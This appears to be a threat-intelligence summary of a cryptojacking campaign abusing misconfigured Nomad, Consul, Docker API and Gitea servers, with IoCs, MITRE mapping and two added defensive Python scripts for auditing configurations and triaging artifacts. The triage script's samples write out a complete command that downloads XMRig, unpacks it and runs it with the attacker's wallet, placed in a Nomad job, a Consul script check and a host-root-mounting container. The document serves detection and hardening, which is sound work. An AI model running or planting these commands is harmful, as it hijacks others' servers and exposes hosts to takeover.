A cryptojacking campaign by the threat actor JINX-0132 targets publicly accessible DevOps servers running Nomad, Consul, the Docker API, and Gitea by exploiting misconfigurations and known vulnerabilities. The attackers rely on off-the-shelf tooling, the open-source XMRig miner fetched straight from its GitHub releases, rather than custom malware or their own infrastructure, which makes the activity harder to attribute and harder to separate from legitimate use. #JINX0132 #Nomad #Consul #Gitea #DockerAPI #XMRig
Keypoints
- JINX-0132 exploits misconfigurations in Nomad, Consul, the Docker API, and Gitea to deploy the XMRig Monero miner on compromised servers.
- This campaign represents the first publicly documented exploitation of Nomad misconfigurations for cryptojacking purposes.
- The attackers download the XMRig miner directly from its public GitHub repository and execute it without using attacker-controlled infrastructure.
- Nomad's default configuration ships with ACLs disabled, so any client that can reach the server API can register and run jobs; a job is executed on a Nomad client, which makes this remote code execution on the cluster.
- Gitea instances are compromised through a mix of known vulnerabilities and misconfigurations: post-authentication RCE via git hooks on older versions, and installations whose setup wizard was left unlocked (INSTALL_LOCK=false), which lets anyone who reaches the installer create an administrator account.
- Consul agents running with ACLs disabled and script checks enabled accept service registrations from anyone; a script health check attached to such a registration is run by the agent on every check interval, and the attackers use it to execute the download-and-run command for the miner.
- A Docker daemon whose API is exposed on TCP 2375 (plaintext) or 2376 (TLS, but without client-certificate verification) lets any client create and start containers; a container created with the host filesystem bind-mounted gives the attacker root-level access to the host outside the container.
- Wiz Research data shows high exposure rates of these vulnerable technologies in cloud environments, emphasizing the need for proper security configurations.
- Recommended defenses: enable ACLs on Nomad and Consul (Consul with a default-deny policy, since ACLs that default to allow protect nothing), keep Gitea's git hooks disabled and its installer locked, disable Consul script checks (or at least limit them to local registrations with enable_local_script_checks), never expose the Docker API on a TCP port without TLS client-certificate verification, and keep Gitea and the other components up to date.
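The defenses above correspond to specific settings in each product. What follows is an added example, not code from the Wiz report or from the Nomad, Consul, Docker or Gitea projects: a Python audit that reads Nomad and Consul agent configuration in their JSON form (both accept JSON as well as HCL), Docker's daemon.json, and Gitea's app.ini, and returns one finding per setting that leaves the service in the state this campaign abuses. The setting names (acl.enabled, acl.default_policy, enable_script_checks, hosts/tlsverify, INSTALL_LOCK, DISABLE_GIT_HOOKS) are the products' real ones; the weak and hardened sample configurations are constructed for the example.

```python
"""Configuration audit for the four services targeted by JINX-0132.

Added example, not code from the Wiz report or from Nomad, Consul, Docker or
Gitea.  Each audit_* function takes one service's configuration and returns
one finding per setting that leaves it exploitable.  Sample configs below are
constructed for this example.
"""
import configparser
from typing import Any, Dict, List


def audit_nomad(cfg: Dict[str, Any]) -> List[str]:
    # Nomad ships with ACLs off; then any client that can reach the server
    # API may register a job, which is code execution on a Nomad client.
    findings = []
    if not cfg.get("acl", {}).get("enabled", False):
        findings.append("nomad: acl.enabled is false (job submission is unauthenticated)")
    return findings


def audit_consul(cfg: Dict[str, Any]) -> List[str]:
    findings = []
    acl = cfg.get("acl", {})
    if not acl.get("enabled", False):
        findings.append("consul: acl.enabled is false (anyone can register services and checks)")
    elif acl.get("default_policy", "allow") != "deny":
        findings.append("consul: acl.default_policy is not 'deny' (unknown tokens are still allowed)")
    # A script check runs its command on the agent at every interval; with
    # this on, a malicious registration is a persistent shell.
    if cfg.get("enable_script_checks", False):
        findings.append("consul: enable_script_checks is true (registered checks execute commands)")
    return findings


def audit_docker(cfg: Dict[str, Any]) -> List[str]:
    # Any tcp:// listener exposes the full daemon API; 2376 is the TLS port
    # only by convention, and TLS without tlsverify still admits any client.
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify", False):
        findings.append("docker: API on %s without tlsverify (client certs not required)"
                        % ", ".join(tcp_hosts))
    return findings


def audit_gitea(app_ini: str) -> List[str]:
    findings = []
    parser = configparser.ConfigParser(interpolation=None)
    # app.ini may carry keys before its first section; give them a home.
    parser.read_string("[DEFAULT]\n" + app_ini)
    sec = parser["security"] if parser.has_section("security") else parser["DEFAULT"]
    if not sec.getboolean("INSTALL_LOCK", fallback=False):
        findings.append("gitea: INSTALL_LOCK is false (setup wizard reachable, admin account can be created)")
    hooks_off = sec.get("DISABLE_GIT_HOOKS")
    if hooks_off is None:
        findings.append("gitea: DISABLE_GIT_HOOKS not set (default differs by version; set it to true)")
    elif not sec.getboolean("DISABLE_GIT_HOOKS"):
        findings.append("gitea: DISABLE_GIT_HOOKS is false (git hooks give authenticated users RCE)")
    return findings


def audit_all(cfgs: Dict[str, Any]) -> List[str]:
    return (audit_nomad(cfgs["nomad"]) + audit_consul(cfgs["consul"])
            + audit_docker(cfgs["docker"]) + audit_gitea(cfgs["gitea"]))


# Constructed samples: the exposed state the campaign looks for, and the fix.
WEAK = {
    "nomad": {"datacenter": "dc1", "server": {"enabled": True}},            # no acl block
    "consul": {"server": True, "enable_script_checks": True},                # no acl block
    "docker": {"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]},
    "gitea": "[security]\nINSTALL_LOCK = false\nDISABLE_GIT_HOOKS = false\n",
}
HARDENED = {
    "nomad": {"datacenter": "dc1", "server": {"enabled": True}, "acl": {"enabled": True}},
    "consul": {"server": True, "acl": {"enabled": True, "default_policy": "deny"},
               "enable_script_checks": False, "enable_local_script_checks": True},
    "docker": {"hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
               "tlsverify": True, "tlscacert": "/etc/docker/ca.pem"},
    "gitea": "[security]\nINSTALL_LOCK = true\nDISABLE_GIT_HOOKS = true\n",
}

if __name__ == "__main__":
    for label, cfgs in (("weak", WEAK), ("hardened", HARDENED)):
        findings = audit_all(cfgs)
        print("%s: %d finding(s)" % (label, len(findings)))
        for f in findings:
            print("  -", f)
```

Run against the weak set it reports six findings (one each for Nomad and Docker, two each for Consul and Gitea); against the hardened set it reports none. The Docker check deliberately does not trust the port number: a 2376 listener with tls but without tlsverify is flagged just like 2375.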
MITRE Techniques
- [T1059] Command and Scripting Interpreter – Shell commands executed through Nomad jobs and Consul health checks to download and run the XMRig miner (‘apt-get update -y ; wget https://github.com/xmrig/xmrig/releases…’ ).
- [T1190] Exploit Public-Facing Application – Exploitation of Gitea RCE vulnerabilities (e.g., CVE-2020-14144) and of the Gitea, Nomad, Consul and Docker API misconfigurations to gain an initial foothold (‘Older versions of Gitea can be susceptible to post-authentication remote code execution’).
- [T1105] Ingress Tool Transfer – The miner is fetched directly from the XMRig project's public GitHub releases rather than from attacker-controlled servers, so at the network level the download looks like any other github.com fetch (‘downloads the most recent version of XMRig miner directly from its public GitHub repository’).
- [T1053.007] Scheduled Task/Job: Container Orchestration Job – Registering a job on a Nomad server with ACLs disabled, which the scheduler then runs on a client (‘any user with access to the Nomad server API can create and run these jobs’); Consul script checks follow the same pattern, with the agent running the check command on a fixed interval.
- [T1610] Deploy Container – Using the exposed Docker API to create and start a container that runs the miner.
- [T1611] Escape to Host – The container is created with the host filesystem bind-mounted, giving the attacker access to the host outside the container (‘attackers can create a container that mounts the host filesystem’).
- [T1496] Resource Hijacking – Running XMRig on the compromised servers to mine Monero to the wallet listed below.
Indicators of Compromise
- [Wallet Address] Used by XMRig miner to receive mined Monero – 468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E
- [URL] XMRig binary download source – https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz
- [Software Versions] Vulnerable Gitea versions – 1.1.0 through 1.12.5 (post-authentication RCE via git hooks, CVE-2020-14144), 1.4.0 (unauthenticated RCE)
- [Configuration Flags] Gitea insecure settings in app.ini, [security] section – DISABLE_GIT_HOOKS set to false (or git hooks enabled manually), INSTALL_LOCK=false (setup wizard still reachable)
- [Ports] Docker API exposed – tcp://0.0.0.0:2375 (plaintext) and 2376 (TLS; equally exposed unless the daemon requires client certificates via tlsverify), allowing remote container control
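The indicators above and the execution paths in the MITRE section can be checked against the artifacts each service hands back. The following is an added example, not code from the Wiz report: a Python triage script that walks a Nomad job in its JSON job-spec shape, a Consul service registration in the shape of the /v1/agent/service/register payload, and a container record in the shape of `docker inspect` output, and flags the campaign's pattern (raw_exec or script-check execution, host root bind-mount, a download chained into execution, the XMRig release URL and the wallet from the IoC list). The three samples are constructed for the example; the download-and-run command in them is modelled on the quoted snippet and contains no mining pool, and the detection heuristics are this example's own, not Wiz's.

```python
"""Triage Nomad jobs, Consul registrations and Docker containers for the
JINX-0132 tradecraft.  Added example, not code from the Wiz report; the
samples are constructed and the heuristics are the example's own."""
import re
from typing import Any, Dict, List, Tuple

# IoCs from the report.
IOC_WALLET = ("468VEByGGFQSN2bJG99ovhe5SG9SLxLAA9e2s7tWFxvBM33FAEP4JbwYHEeXexq8"
              "djYpDEHg9Jq6eGF3rREnAAc4UkjLd3E")
IOC_URL = ("https://github.com/xmrig/xmrig/releases/download/v6.22.2/"
           "xmrig-6.22.2-linux-static-x64.tar.gz")

# A fetch utility chained (| ; &&) into unpack, chmod or execution.
DOWNLOAD_EXEC = re.compile(
    r"\b(?:wget|curl)\b[^|;&]*[|;&]+.*(?:\b(?:tar|chmod|sh|bash)\b|\./)", re.I)


def suspicious_command(text: str) -> List[str]:
    """Reasons a command string looks like the campaign's miner drop."""
    reasons = []
    if IOC_WALLET in text:
        reasons.append("known Monero wallet")
    if IOC_URL in text or "github.com/xmrig/xmrig" in text:
        reasons.append("XMRig release download")
    if re.search(r"\bxmrig\b", text, re.I):
        reasons.append("xmrig binary or argument")
    if DOWNLOAD_EXEC.search(text):
        reasons.append("download chained into execution")
    return reasons


def scan_nomad_job(job: Dict[str, Any]) -> List[Tuple[str, str]]:
    """Walk Job -> TaskGroups -> Tasks; flag raw_exec and miner-like commands."""
    hits = []
    for group in job.get("Job", {}).get("TaskGroups", []):
        for task in group.get("Tasks", []):
            where = "nomad task %s" % task.get("Name")
            if task.get("Driver") == "raw_exec":
                hits.append((where, "raw_exec driver runs directly on the client host"))
            cfg = task.get("Config", {})
            cmdline = " ".join([str(cfg.get("command", ""))] + [str(a) for a in cfg.get("args", [])])
            hits += [(where, r) for r in suspicious_command(cmdline)]
    return hits


def scan_consul_registration(reg: Dict[str, Any]) -> List[Tuple[str, str]]:
    """A registration with a script check: the agent runs Args every interval."""
    hits = []
    checks = reg.get("Checks") or ([reg["Check"]] if "Check" in reg else [])
    for chk in checks:
        args = chk.get("Args") or chk.get("args") or []
        if not args:          # HTTP/TCP checks carry no command
            continue
        where = "consul service %s script check" % reg.get("Name")
        hits.append((where, "script check executes: %s" % " ".join(args)[:60]))
        hits += [(where, r) for r in suspicious_command(" ".join(args))]
    return hits


def scan_docker_container(inspect: Dict[str, Any]) -> List[Tuple[str, str]]:
    """Host root bind-mount, privileged flag, and the container's command."""
    hits = []
    where = "docker container %s" % inspect.get("Name", "?")
    host_cfg = inspect.get("HostConfig", {})
    for bind in host_cfg.get("Binds", []):
        if bind.split(":", 1)[0] == "/":
            hits.append((where, "host root filesystem mounted (%s)" % bind))
    if host_cfg.get("Privileged"):
        hits.append((where, "privileged container"))
    cmd = " ".join(inspect.get("Config", {}).get("Cmd") or [])
    hits += [(where, r) for r in suspicious_command(cmd)]
    return hits


# Constructed samples (shape of the real APIs, contents made up for the example;
# the miner command follows the quoted snippet and omits any pool address).
MINER_CMD = ("apt-get update -y ; wget %s ; tar -xzf xmrig-6.22.2-linux-static-x64.tar.gz ; "
             "./xmrig-6.22.2/xmrig -u %s" % (IOC_URL, IOC_WALLET))
SAMPLE_NOMAD_JOB = {"Job": {"ID": "system-update", "Type": "batch", "TaskGroups": [
    {"Name": "g", "Tasks": [{"Name": "run", "Driver": "raw_exec",
                             "Config": {"command": "/bin/sh", "args": ["-c", MINER_CMD]}}]}]}}
SAMPLE_CONSUL_REG = {"Name": "web-health", "Port": 80,
                     "Check": {"Args": ["/bin/sh", "-c", MINER_CMD], "Interval": "30s"}}
BENIGN_CONSUL_REG = {"Name": "api", "Port": 8080,
                     "Check": {"HTTP": "http://localhost:8080/health", "Interval": "10s"}}
SAMPLE_DOCKER = {"Name": "/alpine-task",
                 "Config": {"Image": "alpine", "Cmd": ["chroot", "/mnt", "sh", "-c", MINER_CMD]},
                 "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}}

if __name__ == "__main__":
    for where, reason in (scan_nomad_job(SAMPLE_NOMAD_JOB)
                          + scan_consul_registration(SAMPLE_CONSUL_REG)
                          + scan_consul_registration(BENIGN_CONSUL_REG)
                          + scan_docker_container(SAMPLE_DOCKER)):
        print("%s: %s" % (where, reason))
```

Each of the three malicious samples yields five hits (the execution mechanism plus the four command-level reasons), the benign HTTP check yields none. Feed real data by passing `json.load`-ed output of `nomad job inspect`, the agent's persisted service definitions, and `docker inspect`; the wallet and URL matches are exact and will age with the campaign, while the raw_exec, script-check, root bind-mount and download-chain checks describe the technique and keep working when the binary version changes.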
Read more: https://www.wiz.io/blog/jinx-0132-cryptojacking-campaign